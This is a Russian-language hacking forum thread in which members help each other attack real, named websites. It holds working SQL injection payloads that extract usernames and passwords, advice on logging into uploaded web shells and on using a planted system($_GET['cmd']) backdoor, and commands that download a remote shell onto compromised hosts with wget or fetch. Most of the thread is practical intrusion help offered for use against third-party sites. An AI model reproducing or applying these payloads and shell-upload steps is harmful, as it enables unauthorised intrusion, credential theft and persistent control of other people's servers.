Table found: MGMT_DB_RECUSERSETTINGS_ECM

Table found: MGMT_DB_RECTSSETTINGS_ECM

Table found: MGMT_DB_RECSEGMENTSETTINGS_ECM

Table found: MGMT_DB_INVOBJS_ECM

Table found: MGMT_OB_ADMIN_CLIENT_DB

Table found: MGMT_OB_ADMIN_HOSTS

Table found: MGMT_OSM_DISK_GROUP_ECM

Table found: MGMT_HA_CLS_INTR_CONN

Table found: MGMT_HA_RAC_INTR_CONN

Table found: DEPT

Table found: EMP

Table found: BONUS

Table found: SALGRADE

Table found: TMP_PAOLO

Table found: TACL

Table found: TACTION

Table found: TDICSTORAGE

Table found: TDICTIONARY

Table found: TGROUP

Table found: TNEWS

Table found: TPRESSRELEASE

Table found: TPRODUCT

Table found: TPRODUCTATTR

Table found: TPRODUCTSTORAGE

Table found: TPRODUCTTECH

Table found: TPRODUCTTYPE

Table found: TSCITY

Table found: TSERVICECENTRE

Table found: TSREGION

Table found: TSTATICCONTENT

Table found: TTECHNOLOGY

Table found: TACL

Table found: TACTION

Table found: TDICSTORAGE

Table found: TDICTIONARY

Table found: TGROUP

Table found: TNEWS

Table found: TPRESSRELEASE

Table found: TPRODUCT

Table found: TPRODUCTATTR

Table found: TPRODUCTSTORAGE

Table found: TPRODUCTTECH

Table found: TPRODUCTTYPE

Table found: TSCITY

Table found: TSERVICECENTRE

Table found: TSREGION

Table found: TTECHNOLOGY

Table found: TACL

Table found: TACTION

Table found: TDICSTORAGE

Table found: TDICTIONARY

Table found: TGROUP

Table found: TNEWS

Table found: TPERSON

Table found: TPRESSRELEASE

Table found: TPRODUCT

Table found: TPRODUCTATTR

Table found: TPRODUCTSTORAGE

Table found: TPRODUCTTECH

Table found: TPRODUCTTYPE

Table found: TSCITY

Table found: TSERVICECENTRE

Table found: TSREGION

Table found: TTECHNOLOGY

Table found: TS_STATE

Table found: TPERSON

Table found: HD_ERROR_TYPE

Table found: SOFTWARE

Table found: PC

Table found: PC_WARRANTY

Table found: HD_USERS_BCK_16062011

Table found: TPRTYPE

Table found: TPRMEMBER

Table found: PM_STATE

Table found: PM_TYPE

Table found: PM_POST

Table found: TPRTYPE

Table found: TPRMEMBER

Table found: PM_POST_ATTACHMENTS

Table found: HD_USERS_BCK_02032011

Table found: PM_PROBLEM

Table found: MGMT_DIROBJ_USERS_HOTLIST

Table found: MGMT_DB_INIT_PARAMS_ECM

Table found: MGMT_LICENSABLE_TARGET_TYPES

Table found: MGMT_USER_JOBS

Table found: MGMT_USER_TARGETS

Table found: MGMT_PRIV_GRANTS

Table found: MGMT_ROLE_GRANTS

Table found: MGMT_PRIV_INCLUDES

Table found: MGMT_LAST_VIOLATION

Table found: MGMT_NOTIFY_NOTIFYEES

Table found: ESM_COLLECTION

Table found: MGMT_COLLECTION_CREDENTIALS

Table found: MGMT_JOB_CREDENTIALS

Table found: MGMT_CONTAINER_CREDENTIALS

Table found: MGMT_ENTERPRISE_CREDENTIALS

Table found: MGMT_HOST_CREDENTIALS

Table found: MGMT_TARGET_CREDENTIALS

Table found: MGMT_CREDENTIAL_TYPE_REF

Table found: MGMT_BLACKOUT_WINDOWS

Table found: MGMT_METRICS_1DAY

Table found: MGMT_METRICS_1HOUR

Table found: MGMT_CURRENT_METRICS

Table found: MGMT_METRICS_RAW

Table found: AQ$_MGMT_NOTIFY_QTABLE_I

Table found: AQ$_MGMT_NOTIFY_QTABLE_G

Table found: AQ$_MGMT_NOTIFY_QTABLE_H

Table found: AQ$_MGMT_NOTIFY_QTABLE_T

Table found: RLM4J$ATTRALIASES

Table found: RLM4J$RULESET

Table found: RLM4J$EVTSTRUCTS

Table found: RLM$JOBQUEUE

Table found: RLM$SCHACTERRS

Table found: RLM$INCRRRSCHACT

Table found: RLM$PARSEDCOND

Table found: RLM$DMLEVTTRIGS

Table found: RLM$ORDERCLSALS

Table found: RLM$EQUALSPEC

Table found: RLM$PRIMEVTTYPEMAP

Table found: RLM$RSPRIMEVENTS

Table found: RLM$RULESETPRIVS

Table found: RLM$RULESET

Table found: RLM$EVENTSTRUCT

Table found: EXF$EXPSETSTATS

Table found: EXF$IDXSECOBJ

Table found: EXF$ASUDFLIST

Table found: EXF$ATTRLIST

Table found: EXF$EXPSETPRIVS

Table found: EXF$EXPRSET

Table found: EXF$ATTRSET

Table found: EXF$JAVAMSG

Table found: MGMT_DB_SIZE_GTT

Table found: MGMT_DB_FILE_GTT

Table found: MGMT_BSLN_RAWDATA

Table found: MGMT_TEMPT_SQL

Table found: TS_VMO

Table found: TS_TIME_VMO

Table found: MIGR_TS_ACTIVITY

Table found: MIGR_TS_USERS

Table found: TS_BOOKING_USER

Table found: TS_PROJECTS

Table found: HD_CENTRALLY_MANAGE

Table found: HD_STATE

Table found: HD_APPLICATION

Table found: HD_PRIORITY

Table found: TS_HUMANRESOURCES_MAIL

Table found: HD_MONITOR_SR

Table found: HD_DIPARTIMENTO

Table found: TS_TYPE_VMO

Table found: HD_USERS

Table found: HD_WORKFLOW_TYPE

Table found: TS_APPROVAL

Table found: HD_CONNECT

Table found: HD_WORKFLOW

Table found: MGMT_ADMIN_LICENSES

Table found: HD_SOFTWARE

Table found: TS_TIMESHEET

Table found: LOGGED_USER

Table found: HD_REQUEST_TYPE

Table found: HD_IMPACT

Table found: TS_TIMESHEET_SENT

Table found: TS_TIMESHEET_APPROVED

Table found: HD_FCA

Table found: TS_TIMESHEET_COMPLETED

Table found: TS_ACTIVITY

Table found: HD_PC

Table found: HD_GROUP

Table found: TS_PROJECT_ATTACHMENTS

Table found: TS_ACTIVITY_ATTACHMENTS

Table found: MIGR_TS_PROJECT

Table found: TS_ACTIVITY_LOG

Table found: HD_SERVICE_REQUEST

Table found: BACKUP_TS_TIMESHEET

Table found: HD_ATTACH

Table found: RLM$VALIDPRIVS

Table found: RLM$RULESETSTCODE

Table found: RLM$ERRCODE

fl00der
25.07.2011, 01:33
FlaktW said:
Как-то так:
DB Name: DBGP1
Table found: OL$
Table found: OL$HINTS
...


И теперь главное, расскажи как ты это получил, пожалуйста.

Expl0ited
25.07.2011, 09:46
fl00der said:
И теперь главное, расскажи как ты это получил, пожалуйста.


Он использовал havij

qaz
25.07.2011, 11:28
Всем привет, помогите плыз разкрутить скулю,

http://plusicq.ru/shop/buycard.php?region=ru'&uin=9139729

я прост немного немогу понять значения запроса в БД, там ваще есть смысл штото проовать?

Melfis
25.07.2011, 12:15
qaz said:
Всем привет, помогите плыз разкрутить скулю,
http://plusicq.ru/shop/buycard.php?region=ru'&uin=9139729
я прост немного немогу понять значения запроса в БД, там ваще есть смысл штото проовать?


Это ни разу не скуль. Пойми простые основы как определить есть ли скуль в запросе или нет. Простое подсовывание кавычки в запрос с последующим редиректом/выводом пустой страницы/выводом ошибки скрипта не значат о наличии скули на 100%.

547
25.07.2011, 12:21
Expl0ited, вопрос наверное к тебе, не получается вытащить данные из колонок USERNAME,PASSWORD таблица users

http://www.gagauzia.md/search.php

"мой запрос":

'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(table_name=0x75736572 73)and(0x00)in(@x:=concat(@x,0x3a,username,0x3a,pa ssword))))x),6)#

Konqi
25.07.2011, 12:55
547 said:

Expl0ited
, вопрос наверное к тебе, не получается вытащить данные из колонок USERNAME,PASSWORD таблица users
http://www.gagauzia.md/search.php
"мой запрос":
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(table_name=0x75736572 73)and(0x00)in(@x:=concat(@x,0x3a,username,0x3a,pa ssword))))x),6)#


немного модифицировал запрос

'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(users)where(1)in(@x:= concat(@x,0x3a,username,0x3a,password))))x),6)#

Cherep
25.07.2011, 21:35
исходник php файла кодирован в base64.

Но при попытке декодировать онлайн декодерами, вылезает билеберда

вот пример исходника

http://zalil.ru/31466463

попугай
25.07.2011, 21:56
заюзай notepad++ например. Там что-то бинарное

547
25.07.2011, 21:56
http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,version%28%29,8,9

таблички вывести не получилось(

http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,3,4,5,6,uhnex(hex(table_name)),8,9+from+infor mation_schema.tables --+

есть идеи?

попугай
25.07.2011, 22:07
http://www.ldmstudio.com/go/free.php?id=-48+/*!uNion+selEct*/+1,2,/*!concat_ws%280x3a,table_schema,table_name,column_ name%29*/,4,5,6,7,8,9+from+information_schema.columns--

же

Cherep
25.07.2011, 22:27
попугай said:
заюзай notepad++ например. Там что-то бинарное


а поподробнее можно?)

попугай
25.07.2011, 22:34
Cherep said:
а поподробнее можно?)



в текстовом редакторе notepad++ есть встроенный плагин, чтоб base64 гонять туда-обратно.

Кроме того, сейчас попробовал скриптом base64_decode сделать - все прекрасно переводится. А белибирда - это бинарные данные собственно.

p.s Я просто не так тебя понял, я думал у тебя просто ошибка в декодинге была.

Cherep
25.07.2011, 22:45
попугай said:
в текстовом редакторе notepad++ есть встроенный плагин, чтоб base64 гонять туда-обратно.
Кроме того, сейчас попробовал скриптом base64_decode сделать - все прекрасно переводится. А белибирда - это бинарные данные собственно.
p.s Я просто не так тебя понял, я думал у тебя просто ошибка в декодинге была.


ладно пасиба, буду пробывать)

FlaktW
25.07.2011, 23:56
Господа, помогите раскрутить эту скулю:

http://www.xakep.ru/local/include/voter_com.asp?action=add&filedir=2246941'&site=xakep

fl00der
26.07.2011, 00:20
Expl0ited said:
Он использовал havij


А может кто-нидь реально рассказать, как самому сделать?

А то всякие хеведжи не интересуют.

Gorev
26.07.2011, 00:50
Konqi said:
немного модифицировал запрос
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(users)where(1)in(@x:= concat(@x,0x3a,username,0x3a,password))))x),6)#


вбей в гугл хеш админа... боян этот сайт ..да и интересного ничего там нет ..только как спортивный интереc

Expl0ited
26.07.2011, 00:59
FlaktW said:
Господа, помогите раскрутить эту скулю:
http://www.xakep.ru/local/include/voter_com.asp?action=add&filedir=2246941'&site=xakep




Code:
http://www.xakep.ru/local/include/voter_com.asp?action=add&site=xakep&filedir=(2246941)and(substring((db_name()),1,1)='w ')



Code:
master
tempdb
model
msdb
forum_integr
files
wbanner
wcounter
wvote
www
wrate
zbit_net_chat
catalogs
test
forum_gameland
forum_xakep

Дальше тянуть не стал.

freezed
26.07.2011, 08:48
fl00der said:
А может кто-нидь реально рассказать, как самому сделать?
А то всякие хеведжи не интересуют.


http://www.candy.ru/detail.asp?PrId=690+and+1=0+union+all+select+null, null,null,null,null,null,null,null,null,table_name ,null,null,null+from+sys.user_tables

чем два дня ждать, пока кто-нибудь расскажет, хотя бы открыл мануал по ораклу и сам бы разбирался

/thread40576.html

winstrool
26.07.2011, 11:14
Qwert321 said:
Помогите кто-нить... есть шелл залитый р57, но почему он не пашет?
http://matkarent.ee/wp-includes/images/crystal/list.png
всё перепробовал


а втойже папке где шелл, файлик есть ли такой .htaccess

в котором должно быть прописано


AddType application/x-httpd-php .png


без этого сервер будет твой png читать как картинку а не как скрипт.

lukmus
26.07.2011, 11:17
Qwert321 said:
Помогите кто-нить... есть шелл залитый р57, но почему он не пашет?
http://matkarent.ee/wp-includes/images/crystal/list.png
всё перепробовал
и черезз get заросы в строке не пашет...


на шелл есть права на чтение/выполнение?

какое расширение у шелла? исполнительные ли файлы с этим расширением в .htaccess?

шелл открывается как на скрине?

lukmus
26.07.2011, 11:51
Qwert321 said:
Это и есть сам шелл, в .htaccess добавлен тип .png
Там рядом лежат ещё blank.png тоше шелл, но забыл пароль... понакуре поставил.


залей нормальный шел https://rdot.org/forum/showthread.php?t=1085.

А если шелл с расширением .php заливать он работает?

Nolen88
26.07.2011, 22:18
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php

вот кусок кода из шелла про авторизацию

$login = "2";

$pass = "2";

$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";

не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.

winstrool
26.07.2011, 22:58
Nolen88 said:
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
вот кусок кода из шелла про авторизацию
$login = "2";
$pass = "2";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.


воспользуйся шеллом WSO самый простой и удобный шелл

ZARO
26.07.2011, 23:16
Стоит phpMyAdmin 2.11.10

Можно ли как нибудь раскрыть пути?

попугай
26.07.2011, 23:17
Nolen88 said:
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
вот кусок кода из шелла про авторизацию
$login = "2";
$pass = "2";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.



$login = "root";

$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";

логин root

пасс 2

FlaktW
27.07.2011, 01:01
Как насчет этой скули?


http://bookmail.ru/shop/product/id/4380'


Как ее крутить?

Konqi
27.07.2011, 01:03
FlaktW said:
Как насчет этой скули?
Как ее крутить?



как то так

http://bookmail.ru/shop/product/id/4380'+or+(select+count(*)from(select+1+union+selec t+2+union+select+3)x+group+by+concat(mid((select+t able_name+from+information_schema.tables+limit+0,1 ),1,64),floor(rand(0)*2)))+and+'1

FlaktW
27.07.2011, 01:07
Konqi said:
как то так
http://bookmail.ru/shop/product/id/4380'+or+(select+count(*)from(select+1+union+selec t+2+union+select+3)x+group+by+concat(mid((select+t able_name+from+information_schema.tables+limit+0,1 ),1,64),floor(rand(0)*2)))+and+'1


Это круто!

Nolen88
27.07.2011, 05:03
попугай said:
$login = "root";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
логин root
пасс 2




winstrool said:
воспользуйся шеллом WSO самый простой и удобный шелл


Что то вы или невнимательно меня прочли или одно из двух, я не спрашиваю какой шелл мне лучше использовать потому что залит уже этот. Я не спрашиваю какой логин мне лучше использовать мне нужно объяснить как прописать в строке браузера логин и пароль чтобы шелл меня пустил, вот и все. Шелл лежит по адресу www.site.ru/faq.php

AnGeI
27.07.2011, 05:31
Nolen88 said:
мне нужно объяснить как прописать в строке браузера логин и пароль чтобы шелл меня пустил, вот и все. Шелл лежит по адресу www.site.ru/faq.php


http://s57.radikal.ru/i155/1107/9d/5612c5da92e8.jpg

Нету никаких логинов, только пароль. Он передается через POST, если изменить на GET или REQUEST, то можно использовать: www.site.ru/faq.php?pass=qwerty

Nolen88
27.07.2011, 05:52
AnGeI said:
http://s57.radikal.ru/i155/1107/9d/5612c5da92e8.jpg
Нету никаких логинов, только пароль. Он передается через POST, если изменить на GET или REQUEST, то можно использовать: www.site.ru/faq.php?pass=qwerty


Вы издеваетесь? Я говорю шелл уже залит и поздняк метатся, нужно просто понять как он авторизуется, ведь авторизация в нем уже есть, просто я не знаю как в нее войти, c99madshell очень популярный шелл неужели никто им не пользовался?

d1v
27.07.2011, 07:36
Nolen88 said:
Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
вот кусок кода из шелла про авторизацию
$login = "2";
$pass = "2";
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.


$login = "2"; // ЛОГИН (С) К.О.

$pass = "2"; //ПАРОЛЬ (С) К.О

$md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; //ХЕШ ПАРОЛЯ (С) К.О.

Если хеш стоит, то приоритет будет у $md5_pass, а не $pass, т.е. при авторизации будет использоваться захешированный пароль, а не тот который в plaintext.

Nolen88
27.07.2011, 07:49
d1v said:
$login = "2"; // ЛОГИН (С) К.О.
$pass = "2"; //ПАРОЛЬ (С) К.О
$md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; //ХЕШ ПАРОЛЯ (С) К.О.
Если хеш стоит, то приоритет будет у $md5_pass, а не $pass, т.е. при авторизации будет использоваться захешированный пароль, а не тот который в plaintext.


Извените накипело просто ВЫ наркоманы шоле? Или вы просто посты набиваете и вам лишь бы сказать что нибудь? Я ЗНАЮ ЧТО ПАРОЛЬ 2, ЗНАЮ ЧТО ЛОГИН 2, знаю что хеш пароль 2, я сам это вписал. Я ЗНАЮ ЧТО приоритет будет у $md5_pass. Я разве спросил вас Какой у меня пароль? Я напрямую спрашиваю как вводить логин и пароль чтобы шелл принял его??? И жду ВОТ ТАКОГО ОТВЕТА: Пароль для авторизации нужно водить вот таким синтаксисом - http://site.com/faq.php?pass=c81e728d9d4c2f636f067f89cc14862c - это кстати неправильный вариант. Кто нибудь умеет авторизоваться в с99?

d1v
27.07.2011, 08:13
Nolen88 said:
Извените накипело просто ВЫ наркоманы шоле?


пока кроме тебя я накроманов не вижу.

у c99 шелла Basic авторизация! какой нахъ get?!

если у тебя не появляется форма авторизации, значит ты идиот отснифай заголовки и передай скрипту твой логин и пароль в base64 в формате логин:пароль. в твоём случае это будет Mjoy==

Nolen88
27.07.2011, 08:25
d1v said:
пока кроме тебя я накроманов не вижу.
у c99 шелла Basic авторизация! какой нахъ get?!
если у тебя не появляется форма авторизации,
значит ты идиот
отснифай заголовки и передай скрипту твой логин и пароль в base64 в формате логин:пароль. в твоём случае это будет Mjoy==


Откуда я могу знать какая у него авторизация, единственное что он у меня пишет это c99madshell v.2.0 madnet edition: access denied в самом низу страницы мелкими буквами. Поподробнее распиши, как снифать и куда Mjoy== писать)))и кстати в base64 Mg== это цифра 2 почему Mjoy==?

d1v
27.07.2011, 08:33
Nolen88 said:
Откуда я могу знать какая у него авторизация, единственное что он у меня пишет это c99madshell v.2.0 madnet edition: access denied в самом низу страницы мелкими буквами. Поподробнее распиши, как снифать и куда Mjoy== писать)))и кстати в base64 Mg== это цифра 2 почему Mjoy==?


1) попробуй сначала открыть шелл в другом браузере. если не помогает установи плагин Tamper Data для FF(что, как, куда - гугл в помощь) и в поле Authorization напиши Basic Mjoy==

2) потому что кодируется не отдельно каждый символ а всё вместе.

kroŧ
27.07.2011, 13:39
На странице

http://www.romauno.tv/page.aspx?ln=it&id=35'

возникает ошибка: Server Error in '/' Application.


Code:


Input string was not in a correct format.

body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }





Server Error in '/' Application.

Input string was not in a correct format.



Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.



Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:






Line 16: void Page_Load(object s, EventArgs e) {
Line 17: language = CMS.GetActiveLanguage(Page);
Line 18: if (Request.QueryString["id"]!=null && Request.QueryString["id"].Length>0) pageId = int.Parse(Request.QueryString["id"]);
Line 19:
Line 20: if (pageId>0) {







Source File: d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx    Line: 18


Stack Trace:






[FormatException: Input string was not in a correct format.]
System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7471479
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119
System.Int32.Parse(String s) +23
ASP.page_aspx.Page_Load(Object s, EventArgs e) in d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx:18
System.Web.Util.CalliHelper.EventArgFunctionCaller (IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Cal lback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627









Version Information: Microsoft .NET Framework Version:2.0.50727.3615; ASP.NET Version:2.0.50727.3618






- это как то можно использовать, кроме раскрытия путей для эксплуатации других уязвимостей?

Пишу sql injection сканер, есть ли тут уязвимость или просто ошибка:

http://www.kolprint.co.il/info.asp?m=1307952780'

http://www.portaldenoticias.com/imagenes/tag/El-Joven-Manos-de-Tijera?page=%275

заранее благодарен за любой ответ.

Cherep
27.07.2011, 13:52
Можно ли какнибудь задампить из под шелла mssql базу?

kroŧ
27.07.2011, 14:40
Cherep да можно, например в WSO есть Sql browser

XAMEHA
27.07.2011, 14:43
Cherep said:
Можно ли какнибудь задампить из под шелла mssql базу?


Да, для этого существуют MsSQL Dump'ер.


kroŧ said:
На странице
http://www.romauno.tv/page.aspx?ln=it&id=35'
возникает ошибка: Server Error in '/' Application.

Code:


Input string was not in a correct format.

body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }





Server Error in '/' Application.

Input string was not in a correct format.



Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.



Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:






Line 16: void Page_Load(object s, EventArgs e) {
Line 17: language = CMS.GetActiveLanguage(Page);
Line 18: if (Request.QueryString["id"]!=null && Request.QueryString["id"].Length>0) pageId = int.Parse(Request.QueryString["id"]);
Line 19:
Line 20: if (pageId>0) {







Source File: d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx    Line: 18


Stack Trace:






[FormatException: Input string was not in a correct format.]
System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7471479
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119
System.Int32.Parse(String s) +23
ASP.page_aspx.Page_Load(Object s, EventArgs e) in d:\inetpub\vhosts\romauno.tv\httpdocs\page.aspx:18
System.Web.Util.CalliHelper.EventArgFunctionCaller (IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Cal lback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627









Version Information: Microsoft .NET Framework Version:2.0.50727.3615; ASP.NET Version:2.0.50727.3618






- это как то можно использовать, кроме раскрытия путей для эксплуатации других уязвимостей?




Code:
Line 18: if (Request.QueryString["id"]!=null && Request.QueryString["id"].Length>0) pageId = int.Parse(Request.QueryString["id"]);

Никак, обычная ошибка типа при передаче параметра в функцию.

AnGeI
27.07.2011, 14:48
Nolen88 said:
Вы издеваетесь? Я говорю шелл уже залит и поздняк метатся, нужно просто понять как он авторизуется, ведь авторизация в нем уже есть, просто я не знаю как в нее войти, c99madshell очень популярный шелл неужели никто им не пользовался?


LiveHttpHeaders в помощь. Отправляешь POST запрос и заходишь в шелл.

Чтобы узнать что именно отправлять смотри исходники.

Osstudio
27.07.2011, 17:53
Если возникает ошибка типа:

An error has occurred: Incorrect syntax near '''. Expected end-of-file, ')', ';', '>', OR, AND, IS, IS_NOT, ORDER_BY. SQLSTATE=42000

Можно ли это как-то использовать?!

semafor
27.07.2011, 17:58
Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код:


if ($_GET['op']){system($_GET['cmd']);
die ('Work');}


Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте.

А как дальше? Что и где выполнять?

kroŧ
27.07.2011, 19:00
semafor

Можно почитать справку по функции

http://ru.php.net/manual/ru/function.system.php

> Функция system (). Вызывает команду операционной системы, выводит результат выполнения на экран и возвращает последнюю строку вывода.

попугай
27.07.2011, 19:07
semafor said:
Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код:
Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте.
А как дальше? Что и где выполнять?



site.ru/logs/logs.php?op=1&cmd=ls

Redwood
27.07.2011, 19:31
semafor said:
Подскажите плиз как с бекдором работать. Допустим по адресу site.ru/logs/logs.php внедрен код:
Я к нему обращаюсь: site.ru/logs/logs.php?op=1 получаю в ответ Work, значит все на месте.
А как дальше? Что и где выполнять?


site.ru/logs/logs.php?op=1&cmd=[системная команда]

Например:

site.ru/logs/logs.php?op=1&cmd=ls -la

Osstudio
27.07.2011, 20:37
alexvrn said:
An error has occurred: Incorrect syntax near '''. Expected ')'. SQLSTATE=42000
как можно раскрутить?


Тот же вопрос..

P.S Судя по всему, ASP.NET

semafor
27.07.2011, 21:34
h00lyshit! said:
site.ru/logs/logs.php?op=1&cmd=
[системная команда]
Например:
site.ru/logs/logs.php?op=1&cmd=ls -la


так я вижу содержание каталога logs. А как залить туда шелл? Пробую

site.ru/logs/logs.php?op=1&cmd=http://moy_domen.ru/readme.txt>1.php

я на хост залил шелл и переименовал его в readme.txt

Но так ничего не выходит. Что неправильно делаю?

d1v
27.07.2011, 22:00
semafor said:
так я вижу содержание каталога logs. А как залить туда шелл? Пробую
site.ru/logs/logs.php?op=1&cmd=http://moy_domen.ru/readme.txt>1.php
я на хост залил шелл и переименовал его в readme.txt
Но так ничего не выходит. Что неправильно делаю?


site.ru/logs/logs.php?op=1&cmd=wget http://moy_domen.ru/readme.txt -O shell.php

XAMEHA
28.07.2011, 06:13
alexvrn said:

Code:
An error has occurred: Incorrect syntax near '''. Expected ')'. SQLSTATE=42000

Помогите срочно


Как обычно, закончив этот запрос и добавив злоумышленный код. Но тут ясновидцев нет, ссылку?

Cherep
28.07.2011, 08:39
при попытке сделать sql inj в vBulletin 4.1.2(форум с капчей), когда посылаю любой запрос(допустим на таблицы), вылезает что я неправильно ввел капчу, хотя при указании запроса в строку


Code:
descending&humanverify%5Binput%5D=число

вписываю правильный ответ

foozzi
28.07.2011, 11:32
на трекерном движке TBDev v2.0 Yuna Scatari Edition есть юзвер в таблице пользователей, при клике на него происходит алерт javascript: alert('надпись!'); это можно как то использовать в своих мерах?

eternal stud
28.07.2011, 11:49
Доброго времени суток. Помогите разобраться пожалуйста. Как можно использовать это - http://mag.su/forum/login.php?sid=351f4eb4d8dbe4ea209f81a4e4bac4ff&username='&password=1

d1v
28.07.2011, 11:51
foozzi said:
на трекерном движке TBDev v2.0 Yuna Scatari Edition есть юзвер в таблице пользователей, при клике на него происходит алерт javascript: alert('надпись!'); это можно как то использовать в своих мерах?


нельзя. вот используй в своих мерах:

/thread79705.html

eternal stud
28.07.2011, 12:20
Moriarty said:
Судя по всему логин и пароль принимаются из $_REQUEST[], но режутся любые пробелы.


Через эту ошибку можно в базу залесть?

M_script
28.07.2011, 12:30
Melfis, ничего не получится, скобки тоже фильтруются

http://mag.su/forum/login.php?sid=351f4eb4d8dbe4ea209f81a4e4bac4ff&username='0()'0&password=1

eternal stud
28.07.2011, 15:11
Подскажите пожалуйста, а с этим можно чего-нить сделать? Это вообще уязвимость или нет? - http://mag.su/maglove/viewprofiles.php?sid=1&next=1'

eternal stud
28.07.2011, 18:53
Как можно использовать это? http://mag.su/showimg.php?foto=;id;&width=$(w)&image=$(g)

Konqi
28.07.2011, 18:56
eternal stud said:
Как можно использовать это? http://mag.su/showimg.php?foto=;id;&width=$(w)&image=$(g)


залей шелл через fetch )

sevenup
28.07.2011, 20:23
eternal stud said:
Как можно использовать это? http://mag.su/showimg.php?foto=;id;&width=$(w)&image=$(g)


fetch http://yousite.com/shell.txt; mv shell.txt shell.php;

Cherep
28.07.2011, 21:00
При попытке залить шелл через eval(file_get_contents('http://site.com/shell.txt')); (vBulletin 4) вылетает вот какая ошибка:

http://pikucha.ru/i5NOd

Expl0ited
28.07.2011, 21:08
Cherep said:
При попытке залить шелл через eval(file_get_contents('http://site.com/shell.txt')); (vBulletin 4) вылетает вот какая ошибка:
http://pikucha.ru/i5NOd


php интерпретатору не удалось получить информацию о удаленном хосте

Cherep
28.07.2011, 21:10
Expl0ited said:
php интерпретатору не удалось получить информацию о удаленном хосте


у меня какбы заходит спокойно по адресу шелла. И что делать?

Expl0ited
28.07.2011, 21:32
Cherep said:
у меня какбы заходит спокойно по адресу шелла. И что делать?


Использовать поиск по форуму: /showthread.php?t=191917

И внимательно читать не только первый пост.

eclipse
28.07.2011, 21:44
Помогите раскрутить SQL inj

Уязвимая страница


Code:
http://www.allyachts.ru/YachtsSearch.asp?ret=2

POST запросом отсылаем


Code:
